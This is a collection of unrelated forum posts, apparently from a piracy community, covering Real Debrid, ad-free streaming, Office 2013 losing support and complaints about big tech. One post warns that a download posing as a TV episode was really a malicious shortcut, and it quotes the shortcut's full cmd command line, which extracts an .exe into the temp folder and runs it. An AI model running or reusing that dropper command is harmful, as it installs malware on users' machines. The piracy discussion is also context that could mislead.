So I've realized with piracy, you can really miss out on a ton when you don't know to look for it. I didn't know about usenet for like a decade as an example. A more topical example - I just discovered Real Debrid a few months ago.

That being said, I use it with Stremio, and I use it with The Crew addon for Kodi to watch sports streams.

What else can I do with RD that I should know about?

I’m a huge tv show/movie enjoyer but unfortunately Hulu and Amazon prime are just riddled with ads and I don’t feel like forking over $17 a month just to not see ads.

How can I watch all my favorite shows with English subtitles on my tv? I have my pc and laptop covered but TV and phone I do not

Recently I couldn't get my legitimately installed copy of microsoft office 2013 to open.... word, powerpoint, excel all wouldn't work.

Turns out microsoft just decided to pull the plug on these programs. As far as I understand, this just means that office 2013 just has no/less security features making it more vulnerable, but other than that.... why not just let me open it?

Oh and also that "life time valid" download cd is now worthless.

I knew they had been doing this with free programs for a while, microsoft paint and windows movie maker being (in)famous ones, but now it's programs that you literally paid for to be valid for a "lifetime"? Why is nobody mad about that? No wonder people turn to "the 7 seas" for their stuff now....

Original Title: I recently had my sonarr setup download a tv show, and it turned out it was a ~1GB file, looked like it should at first glance - but it was... a shortcut to system32, running a command to create a .exe file and possible do all sorts of shit. Stay safe and keep your eyes open!

The file was a VLC icon(unsure if this is because i have vlc installed), with a little arrow, which indicates it was a shortcut. I initially just checked the folder because i usually see the new episode inside plex but there was nothing.

In qbtorrents initial downloads folder, it was sitting... looking like any other file. If i had opened it up from within qBitTorrent i wouldnt have found out...

The shortcut was to:

%comspec% /v:On/CSET urwUMg=Agatha.All.Along.S01E05.1080p.WEB.H264-SuccessfulCrab.mkv&(If not exist "%TMP%!urwUMg!.exe" findstr/v "comspec C8hPlRbD5" !urwUMg!.Lnk>"%TMP%!urwUMg!.exe")&CD %TMP%&TYPE nul>!urwUMg!&START "!urwUMg!" !urwUMg!.exe -PaYHMST4rLm

Note that you shouldn't run this.

It should run a command prompt and check for, or create a .exe file which... could do all sorts of bad things.

Anyways, just wanted to share, so others can avoid ending up in this trap.

if anyone got some more info, or how to avoid this happening in the future, please share.

Stay safe while sailing!

Hi All!

Gabe Newell said it first, piracy isn't a payment issue, it's a service issue.

The last few years i've been transforming my household into this Piracy paradise with a local media server and de-googled phones, the next step is gonna be upgrading to Linux instead of W11, but i'm still rocking W10 enterprise so far as it's still supported.

Anyway, after de-bloating and connecting the third laptop to our media empire i've been wondering, if i am ready to configure all this stuff for hours because big tech makes their services so abysmal, i can't be the only one leaving them.

So if tech savy people like me are pulling the plug and a lot of family memebers follow suit, isn't that detrimental for their buisiness? Of course you still got the moral knights and people that don't do any effort that will use said services. But if my parents are even so fed up that they want to throw the phone off a cliff, more people have to feel that way. And when they realize a nerdy cousin can fix that for them...

Windows shoving ads in your face, stealing every gram of data they can, streaming services offering less and less quality content and removing the good stuff, phones that last significantly shorter in battery life because of unremovable bloat... and i am not even gonna start on the last few updates on our Samsung TV (it's a fucking miracle if it just shows the proper input instead of its own pushed TV app)...

Half of the big tech i deal with daily signed their own death warrant inside of this house. No more Samsung TV's, no more google BS, no more Windows, no more streaming with mediocre offerings.

The fun thing is, i still use Steam and regulary buy games, because it works and they offer exactly what i need/want.

Just wondering, wouldn't it be more succesfull in the long run to please the customer? Rather then alienating and basically antagonizing them? I get that loads of people will always use it, but wouldn't more people use it if they'd play along a bit more?

edit: typos
